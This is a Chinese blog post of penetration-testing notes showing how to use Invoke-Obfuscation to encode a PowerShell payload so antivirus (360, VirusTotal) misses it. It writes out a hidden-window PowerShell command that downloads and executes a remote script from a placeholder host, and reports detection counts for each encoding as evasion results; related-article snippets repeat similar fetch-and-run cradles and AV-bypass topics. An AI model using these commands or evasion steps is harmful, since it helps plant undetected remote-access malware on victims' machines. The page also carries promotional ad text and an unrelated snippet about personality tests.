【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】_yetanotherobfuscator(3)

最新推荐文章于 2024-09-30 23:39:20 发布
原创 最新推荐文章于 2024-09-30 23:39:20 发布 · 207 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记 


2. 下载并用powershell进入项目目录执行:`Import-Module .\Invoke-Obfuscation.psd1;Invoke-Obfuscation`  
 如果报错请先执行:`Set-ExecutionPolicy Unrestricted`  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210706161817618.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
3. 输入要混淆的PS:`set scriptblock 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"'`  
 (设置ps文件:`set scriptpath C:\0_poweshell\msf-crow.ps1`)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707101436777.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
4. 输入`ENCODING`选择要编码的方式:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210706163018114.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)


## 0x03 编码测试


### 1. ASCII


1. 选择1:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707101641940.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
2. 输出:`out PowerShellCodeASCII.ps1`  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102038684.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
3. 免杀与上线测试


* 360静态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102125969.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* 360动态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102310435.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102341857.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* VT:5/58  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021070710421179.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)


### 2. Hex


1. `undo` 撤销上次命令:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102641367.png)
2. 编码并输出:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102813576.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
3. 免杀与上线测试


* 360静态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103208444.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* 360动态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103341749.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103424996.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* VT:9/59  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707104418774.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)


### 3. Octal


1. 编码并输出:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103526543.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
2. 免杀与上线测试


* 360静态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103644109.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* 360动态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103857624.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103940710.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* VT:7/58![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707104752548.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)


## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/484aaf454f383486f9b4ad68238d0b1e.png)

![img](https://img-blog.csdnimg.cn/img_convert/2e4a4907792c6e7d3374f9f46d9660e9.png)

![img](https://img-blog.csdnimg.cn/img_convert/eea02dbbe1cb815c4c502877e457b98a.png)

![img](https://img-blog.csdnimg.cn/img_convert/df9a521dd1ebfac82d987719ffa7cd2b.png)

![img](https://img-blog.csdnimg.cn/img_convert/ac7fbd818ccd311f6131e617fd6cfa6e.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.youkuaiyun.com/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
利用Invoke-Obfuscation工具进行Powershell恶意脚本
m0_62239233的博客
04-18 1370
记录渗透学习中的实验过程。
powershell
zhangshuaiijie的博客
06-24 362
下载Invoke-Obfuscation:https://github.com/danielbohannon/Invoke-Obfuscation。进入Invoke-Obfuscation目录,在powershell中执行。我看了好几篇去年的文章还是能过的,不过现在火狐和360都不能过去。不过在virscan和VirusTotal上面报毒还是很少的。如果报错,在管理员权限下powershell执行。
对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 1008
对抗-Powershell-混淆无文件
42-渗透测试工具Cobalt strike-3.CS邮件钓鱼及cs
XLbb的博客
05-30 3694
LoaderGo软件安装加密 LoaderGo采取的是远程分离加载,我们先对原生shellcode进行加密。 导入shellcode,选择加密方式,这里只写了一种,所以不用选择,直接生成即可。 原邮件连接成功替换成钓鱼连接;照片马也成功发送)。Ladon是一个自动化工具,主要用于快速枚举和测试目标系统上的多个漏洞或弱点。
第109天:对抗-PowerShell&混淆&分离加载&特征修改&EXE生成&填充替换
qq_46081990的博客
07-21 669
代码】第109天:对抗-PowerShell&混淆&分离加载&特征修改&EXE生成&填充替换。
渗透测试笔记】之【工具——使用Invoke-Obfuscation代码混淆powershell】_yetanotherobfuscator
2401_84969340的博客
05-13 600
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
渗透测试笔记】之【工具——使用Invoke-Obfuscation代码混淆powershell
AA8j的博客
07-06 2804
0x01 项目地址 https://github.com/danielbohannon/Invoke-Obfuscation 0x02 用法 生成powershellpowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))" 下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscati
利用Invoke-Obfuscation混淆ps文件实现上线/VT3/55
AerYinan的博客
01-12 9796
利用Invoke-Obfuscation混淆ps文件实现上线/VT3/55
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流软1
08-03
在描述中提到,通过将 Invoke-Obfuscation 应用到 C# 生成的 PowerShell 脚本上,然后使用 PS2EXE 工具将其转换为exe文件,可以有效地绕过某些主流软的检测。例如,在测试过程中,混淆后的脚本不再被某60云查和...
Invoke-Obfuscation笔记
mingyqf的博客
05-11 1524
坑点:window11不行,放到虚拟机win10 就行了 步骤: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation
powershell详解
m0_57836225的博客
08-20 1691
也可以使用 `IEX (Invoke-WebRequest -Uri 'http://malicious-url/script.txt' -UseBasicParsing).Content`,通过 `Invoke-WebRequest`获取远程脚本内容并执行。- 解释:PowerShell 模块是一种组织和封装 PowerShell 代码的方式,`.psm1`文件包含函数、变量、别名等,可以将一组相关的功能打包在一起,以便在多个脚本中重复使用,提高代码的可维护性和可重用性。
| powershell的几种简单方式
weixin_66717977的博客
03-13 1088
对抗 | powershell | 技术
对抗—Powershell混淆&分离&特征修改&填充替换
2301_76227305的博客
09-30 1791
总的来说powershell的效果要比shellcode要好,上面讲的方法都是通用的,在python混淆的时候,也可以利用python进行分离,或者无文件落地。的思路远远不止这些,会有越来越多的思路,而软也会不断迭代升级,二者是相互成长的。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 4219
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
Powershell
mingyqf的博客
05-11 2696
Powershell 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell思路 先介绍一下powershell木马最常用的方式
Ladon九种PowerShell命令混淆加密方法
K8哥哥
11-02 1912
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
我的powershell之路
mingyqf的博客
05-17 2225
我的powershell之路 ​ 原创 tubai
Import-Module : 未能加载指定的模块“\Neo4j-Management.psd1”
热门推荐
小妖666个人笔记
03-10 1万+
在官网下载完zip后,系统环境变量也设置了,但运行语句:neo4j.bat console,报错如下: 因为找不到文件Neo4j-Management.psd1 咱们更改neo4j.ps1文件里Import-Module "$PSScriptRoot\Neo4j-Management.psd1"为绝对路径 修改为: ...
华为od性格测试试题
最新发布
04-23
<think>好的,我现在需要回答用户关于华为OD性格测试的试题样本的问题。首先,用户之前的问题提到了华为OD机试真题,但现在他们想了解的是性格测试的相关内容。我需要先确认是否有相关的引用内容可以提供帮助。 查看提供的引用,引用1到5主要涉及华为OD的机试题目,如编程题、算法题等,但没有直接提到性格测试的内容。引用4提到了中位数的计算,属于数学题,但和性格测试无关。引用5是关于日志采集系统的Python代码,也不相关。 不过,用户可能希望了解华为OD性格测试的一般结构和常见题型,尽管没有直接可用的引用资料,我可以根据常见的性格测试模式来推测华为OD可能采用的试题类型。通常性格测试包括行为倾向、团队合作、压力应对、问题解决等方面的问题。 需要注意,华为的性格测试可能与其他公司类似,侧重于评估候选人的性格特质是否符合公司文化和职位要求。因此,试题可能涉及情境判断题、行为倾向选择、性格特征排序等。 在回答时,应该明确说明这些信息是基于行业常见实践,而非官方发布的样本,避误导用户。同时,提醒用户性格测试没有标准答案,建议根据自身实际情况作答,保持一致性。 另外,用户可能希望了解如何准备此类测试,可以给出一些准备建议,例如了解公司文化、诚实回答等。需要确保回答结构清晰,分点说明,并生成相关问题供用户进一步参考。</think>### 华为OD性格测试相关说明 华为OD(Outsourcing Dispatch)的性格测试通常用于评估候选人的行为倾向、团队协作能力、抗压性等与企业文化匹配度的软性素质。**虽然官方未公开具体试题**,但根据行业经验,测试内容可能包含以下类型: --- #### **1. 行为倾向选择题** - **示例**: 当项目进度延迟时,你会优先? A) 加班追赶进度 B) 分析原因并调整计划 C) 寻求团队帮助 D) 向上级汇报风险 **考察点**:问题解决方式与责任感[^4]。 --- #### **2. 性格特征排序题** - **示例**: 请将以下特质按重要性排序(1-4): - 执行力 - 创新力 - 细节把控 - 沟通能力 **考察点**:岗位适配性(如开发岗可能更关注细节与执行力)[^3]。 --- #### **3. 情境判断题** - **示例**: 同事因失误导致任务延误,你会? A) 直接指出错误 B) 私下沟通改进 C) 主动协助补救 **考察点**:团队协作与冲突处理[^5]。 --- #### **4. 一致性验证题** - **示例**: 同一问题在不同位置重复出现,例如: “你更喜欢独自工作” vs. “团队合作能提升效率” **目的**:检测回答的真实性。 --- ### **准备建议** 1. **了解华为价值观**:如“以客户为中心”“奋斗者精神”[^2]。 2. **保持一致性**:避前后矛盾。 3. **结合实际场景**:选择体现积极、协作的选项。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值